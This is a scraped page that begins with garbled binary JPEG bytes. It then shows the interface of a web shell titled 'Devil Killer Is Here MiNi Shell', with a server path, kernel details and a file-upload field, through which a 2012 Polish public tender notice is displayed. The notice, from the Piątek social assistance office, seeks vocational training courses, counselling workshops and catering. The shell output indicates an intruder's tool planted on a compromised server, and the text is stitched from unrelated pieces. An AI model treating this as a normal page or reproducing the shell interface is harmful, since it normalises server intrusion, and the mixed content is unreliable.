JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120618/207292-N-2012.html

<p class="kh_header"><b>Piątek: Zorganizowanie i przeprowadzenie szkoleń dla 22 osób, zorganizowanie zajęć warsztatowych z psychologiem, doradcą zawodowym oraz porady prawne, zapewnienie cateringu.</b><br>
<b>Numer ogłoszenia: 207292 - 2012; data zamieszczenia: 18.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Piątku , ul. Łowicka 4, 99-100 Piątek, woj. łódzkie, tel. 24 722 10 64, faks 24 722 13 63.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://www.bip.ugpiatek.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń dla 22 osób, zorganizowanie zajęć warsztatowych z psychologiem, doradcą zawodowym oraz porady prawne, zapewnienie cateringu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Zorganizowanie i przeprowadzenie szkoleń dla 22 osób, zorganizowanie zajęć warsztatowych z psychologiem, doradcą zawodowym oraz porady prawne, zapewnienie cateringu.

Przedmiotem zamówienia jest: Organizacja i przeprowadzenie szkolenia pn.
SZKOLENIE I 	- Konserwator powierzchni płaskich;
SZKOLENIE II 	- Glazurnik;
SZKOLENIE III 	- Kierowca - Prawo jazdy - kat. C + Kierowca wózków jezdniowych z napędem silnikowym

Opis przedmiotu Zamówienia: 

SZKOLENIE I - Konserwator powierzchni płaskich

1. Kurs dla 12 osób
 
2. Liczba godzin kursu: 84 godz.
   42 godzin teoria + 42 godzin zajęć praktycznych
 
3. Czas trwania szkolenia ok. 1 miesiąca, (sierpień 2012)

4. Realizacja zajęć w formie warsztatów i ćwiczeń

5. Minimalny zakres kursu Konserwator powierzchni płaskich: 
kurs profesjonalnego sprzątania z użyciem wyspecjalizowanych maszyn i sprzętu mechanicznego 
- obsługa maszyn sprzątających. 
- podział i rodzaje środków czyszczących
- techniki i metody pracy konserwatora powierzchni płaskich
- zasady BHP

6. Kurs kończy się otrzymaniem przez uczestnika zaświadczenia ukończenia kursu zgodne z załącznikiem nr 1 do rozporządzenia MEiN z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216). 

7. Zapewnienie uczestnikom niezbędnych materiałów szkoleniowych. 

8. W cenę kursu wliczyć: 
- koszty podstawowych badań lekarskich, 
- koszt przeprowadzenia 1 egzaminu wewnętrznego i wydania zaświadczenia, 
- koszt materiałów szkoleniowych tzn. podręcznik, notatnik kursanta, długopis
- koszt odzieży ochronnej 


SZKOLENIE II 	- Glazurnik;

1. Kurs dla 5 osób
 
2. Liczba godzin kursu: 150 godz.
   30 godzin teoria + 120 godzin zajęć praktycznych
 
3. Czas trwania szkolenia ok. 1,5  miesiąca, (październik - listopad 2012)

4. Realizacja zajęć w formie warsztatów i ćwiczeń

5. Minimalny zakres kursu Glazurnik: 
- metody i techniki pracy glazurnika.
- obsługa maszyn glazurniczych
- poznanie materiałów glazurniczych
- zasady BHP

6. Kurs kończy się otrzymaniem przez uczestnika zaświadczenia ukończenia kursu zgodne z załącznikiem nr 1 do rozporządzenia MEiN z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216). 

7. Zapewnienie uczestnikom niezbędnych materiałów szkoleniowych. 

8. W cenę kursu wliczyć: 
- koszty podstawowych badań lekarskich, 
- koszt przeprowadzenia 1 egzaminu wewnętrznego i wydania zaświadczenia, 
- koszt materiałów szkoleniowych tzn. podręcznik, notatnik kursanta, długopis, 
- koszt odzieży ochronnej 


SZKOLENIE III 	- Kierowca - Prawo jazdy - kat. C + Kierowca wózków jezdniowych z napędem silnikowym
Opis przedmiotu Zamówienia: 
1. Kurs dla 5 osób 

2. Liczba godzin kursu: 117 godzin/osoba
- kurs prawo jazdy kat C: 50 godzin/osoba
   20 godzin teoria + 30 godzin zajęć praktycznych 
- kurs wózków jezdniowych z napędem silnikowym: 67 godzin/osoba 
   52 godzin teoria + 15 godzin zajęć praktycznych w tym 3 godz. nauka jazdy 

3. Czas trwania szkolenia ok. 1,5  miesiąca, (wrzesień  - październik 2012)
    ok. 1 miesiąc prawo jazdy kat. C
    ok. 3 tyg. Kierowca wózków jezdniowych z napędem silnikowym

3. Realizacja zajęć w formie warsztatów i ćwiczeń 
4. Minimalny zakres kursu Kierowca - Prawo jazdy - kat. C + Kierowca wózków jezdniowych z napędem silnikowym: 
- przypomnienie i poznanie zasad ruchu drogowego
- obsługa wózka widłowego
- nauka wymiany butli gazowych
- zasady BHP

5. Kurs prawa jazdy kat. C powinien być zrealizowany zgodnie z obowiązującym prawem
    i wymogami odnośnie organizacji kursów prawa jazdy kat. C. 

6. Kurs kończy się otrzymaniem przez uczestnika 
- zaświadczenia ukończenia kursu zgodne z załącznikiem nr 1 do rozporządzenia MEiN z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216),
- zaświadczenia o ukończeniu kursu dla kierowców wózków jezdniowych z napędem silnikowym,
- zaświadczenie/certyfikat Urzędu Dozoru Technicznego kat. II WJO,
- uprawnienia w zakresie bezpiecznej obsługi butli gazowych.
7. Zapewnienie uczestnikom niezbędnych materiałów szkoleniowych. 
8. W cenę kursu prawo jazdy kat. C należy wliczyć: 
- koszty pełnych badań lekarskich, 
- koszt przeprowadzenia 1 egzaminu wewnętrznego i wydania zaświadczenia, 
- koszty przeprowadzenia 1 egzaminu państwowego (teoretycznego i praktycznego) w WORD w zakresie prawa jazdy kat. C 
- koszt przeprowadzenia 1 egzaminu dla kierowców wózków jezdniowych z napędem silnikowym przez egzaminatorów Urzędu Dozoru Technicznego
- koszt materiałów szkoleniowych tzn. podręcznik, testy papierowe, lub testy na płycie CD, notatnik kursanta, długopis
- koszt odzieży ochronnej 

Dotyczy: SZKOLENIA I, SZKOLENIA II i SZKOLENIA III.
PSYCHOLOG:
W formie zajęć warsztatowych w okresie od lipca do września 2012 r. w ilości 30 godz. dla wszystkich uczestników oraz 5 godz. indywidualnie dla każdego uczestnika.
DORADCA ZAWODOWY:
W formie zajęć warsztatowych w okresie od października do grudnia 2012 r. w ilości 30 godz. dla wszystkich uczestników oraz 5 godz. indywidualnie dla każdego uczestnika.
PORADY PRAWNE:
W formie zajęć warsztatowych w okresie od lipca do sierpnia 2012 r. w ilości 15 godz. dla wszystkich uczestników oraz 5 godz. indywidualnie dla każdego uczestnika

Dotyczy: SZKOLENIA I, SZKOLENIA II i SZKOLENIA III.
Miejsce wykonania zamówienia:
1. Zajęcia muszą odbywać się w salach szkoleniowych Wykonawcy. Wykonawca zobowiązany jest zapewnić sprzęt audiowizualny, projektor i ekran projekcyjny. 
2. Budynek oraz sala szkoleniowa musi zostać oznakowana informacją o nazwie szkolenia, czasie trwania szkolenia oraz numerem sali szkoleniowej, w której odbywają się zajęcia.
3. Każdy blok szkoleniowy musi zakończyć się spotkaniem podsumowującym z wręczeniem zaświadczenia o ukończeniu szkolenia.
4. Miejsce szkoleń od siedziby projektodawcy nie może być oddalone nie więcej niż 25 km.
- w przypadku realizacji szkolenia poza terenem miejscowości Piątek Wykonawca musi zapewnić dojazd (i powrót) osób szkolonych z Piątku do miejsca realizacji szkolenia. Koszt dojazdu (i powrotu) należy uwzględnić jako składnik ceny oferowanej za wykonanie zamówienia. 
Uwaga: W przypadku gdy miejsce szkolenia będzie zlokalizowane poza terenem miejscowości Piątek, wówczas czas dowozu na miejsce szkolenia i czas powrotu nie będzie wliczany do czasu zajęć.

Każdy kurs musi być realizowany wg programu szkolenia. Program szkolenia stanowiący załącznik do oferty musi zawierać wszystkie elementy wynikające z § 32 ust. 4 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. z dnia 16 marca 2007 r. Nr 47, poz. 315) to jest :
1) nazwę i zakres szkolenia;
2) czas trwania i sposób organizacji szkolenia;
3) wymagania wstępne dla uczestników szkolenia;
4) cele szkolenia;
5) plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej;
6) treści szkolenia w zakresie poszczególnych zajęć edukacyjnych;
7) wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych;
8) sposób sprawdzania efektów szkolenia.

Wykonawca jest zobowiązany przedstawić propozycje kadry o odpowiednim wykształceniu i doświadczeniu w prowadzeniu szkoleń i pozostałych zajęć, zgodnie z wykazem stanowiącym załącznik do oferty.

Przedmiot zamówienia obejmuje również - dotyczy: SZKOLENIA I, SZKOLENIA II i SZKOLENIA III.

1. Przeprowadzenie badań lekarskich, stwierdzających zdolność do odbycia szkolenia co najmniej jeden dzień przed rozpoczęciem szkolenia oraz wydanie książeczek zdrowia, o ile odrębne przepisy tego wymagają;
2. Ubezpieczenie uczestników szkolenia od następstw nieszczęśliwych wypadków powstałych w trakcie szkolenia oraz w drodze na szkolenie i ze szkolenia, zgodnie ze wskazaniem na skierowaniu;
3.Przeprowadzenie egzaminu wewnętrznego/zewnętrznego z zakresu zagadnień programu;
4.Wydanie zaświadczeń o ukończeniu szkolenia i zdobytych kwalifikacjach (zgodnie z aktualnymi wytycznymi dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki);
5.Zapewnienie uczestnikom szkolenia materiałów szkoleniowych (podręczników, kompendium etc. oznakowanych zgodnie z aktualnymi wytycznymi dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki), przekazywanych uczestnikom w dniu rozpoczęcia danego bloku szkoleniowego;
6.Oznakowanie wszystkich prezentacji multimedialnych, materiałów szkoleniowych, list obecności, list odbioru cateringu zaświadczeń i sal wykładowych poprzez umieszczenie logo typów unijnych i logo Projektu (zgodnie z aktualnymi wytycznymi dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki), które są dostępne w biurze projektu, informowanie uczestników szkoleń, iż szkolenia organizowane są przez GOPS w Piątku i współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
7. Zapewnienie cateringu uczestnikom szkoleń grupowych każdego dnia w czasie przerw między zajęciami dydaktycznymi w skład którego ma wejść: kawa rozpuszczalna (bez ograniczeń), kawa sypana (bez ograniczeń), herbata (bez ograniczeń), cukier (bez ograniczeń), woda mineralna 0,5 litra/osobę, oraz poczęstunek w postaci paluszków, kruchych ciastek etc. (bez ograniczeń) Wykonawca zapewni uczestnikom kursu/szkolenia ciepły posiłek (drugie danie).
8. Przygotowanie i prowadzenie dokumentacji kursu, w tym list obecności, list odbioru cateringu, list odbioru materiałów szkoleniowych, list odbioru zaświadczeń. dzienników zajęć
9. Zapewnienie nadzoru wewnętrznego służącego podniesieniu jakości szkolenia;
10. Umożliwienie przeprowadzenia niezapowiedzianych kontroli realizowanego szkolenia w miejscu ich odbywania przez osobę wyznaczoną przez Zamawiającego i Instytucję Pośredniczącą. 
11 Dostarczenia osobom szkolonym sukcesywnie, przed każdym blokiem szkoleniowym: harmonogram szkolenia w formie papierowej, materiały dydaktyczne w formie papierowej a po zakończeniu szkolenia, wydrukowania, rozprowadzenia i zebrania ankiet ewaluacyjnych w wersji papierowej po każdym bloku szkoleniowym,
12.Przeprowadzania zajęć w dostosowanych pomieszczeniach oraz wyposażonych w sprzęt i pomoce dydaktyczne niezbędne do realizacji przedmiotu umowy, spełniających bezpieczne i higieniczne warunki pracy i nauki.
13. Miejsce wykonania zamówienia - w przypadku realizacji szkolenia poza terenem miejscowości Piątek Wykonawca musi zapewnić dojazd (i powrót) osób szkolonych z Piątku do miejsca realizacji szkolenia. Koszt dojazdu (i powrotu) należy uwzględnić jako składnik ceny oferowanej za wykonanie zamówienia. 
14. Wykonawca zapewni uczestnikom odpowiednią odzież (fartuchy, obuwie) które może być wymagane podczas szkoleń oraz sprzęt niezbędny do zajęć praktycznych danego szkolenia. 
Sposób uzyskania informacji dotyczących przedmiotu zamówienia: 
Szczegółowe informacje dotyczące przedmiotu zamówienia można uzyskać osobiście w siedzibie zamawiającego - Gminnym Ośrodku Pomocy Społecznej w Piątku, ul. Łowicka 4 lub telefonicznie pod numerem tel. 024 722 10 64..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ramach tego warunku wykonawca zobowiązany jest do:
złożenia oświadczenia, że wykonawca spełnia warunki określone w art. 22 ust. 1 wskazanej ustawy - wg załącznika nr 2 oraz złożenia oświadczenia dotyczące wpisu lub aktualizacji wpisu w Rejestrze Instytucji Szkoleniowych na rok 2012 -  wg załącznika nr 5</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ramach tego warunku wykonawca zobowiązany jest do: 
wykazania się w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, iż wykonał minimum dwa zamówienia w zakresie szkolenia osób bezrobotnych finansowanych przez Unię Europejską ze środków Europejskiego Funduszu Społecznego nie mniejszej niż 50.000 zł. (słownie: pięćdziesiąt tysięcy złotych) każde oraz załączy dokument potwierdzający, że usługi zostały wykonane zgodnie z obowiązującym prawem i zasadami udzielanej pomocy przez Unię Europejską.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ramach tego warunku wykonawca zobowiązany jest do: 
złożenia oświadczenia, że wykonawca spełnia warunki określone w art. 22 ust. 1 wskazanej ustawy - wg załącznika nr 2</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ramach tego warunku wykonawca zobowiązany jest do:
złożenia oświadczenia, że wykonawca spełnia warunki określone w art. 22 ust. 1 wskazanej ustawy - wg załącznika nr 2</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenia dotyczące wpisu lub aktualizacji wpisu w Rejestrze Instytucji Szkoleniowych na rok 2012 - wg załącznika nr 5.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.ugpiatek.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Piątku
99-120 Piątek,
ul. Łowicka 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2012 godzina 10:00, miejsce: Oferty należy składać w siedzibie Gminny Ośrodek Pomocy Społecznej w Piątku, 99-120 Piątek, ul. Łowicka 4 w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




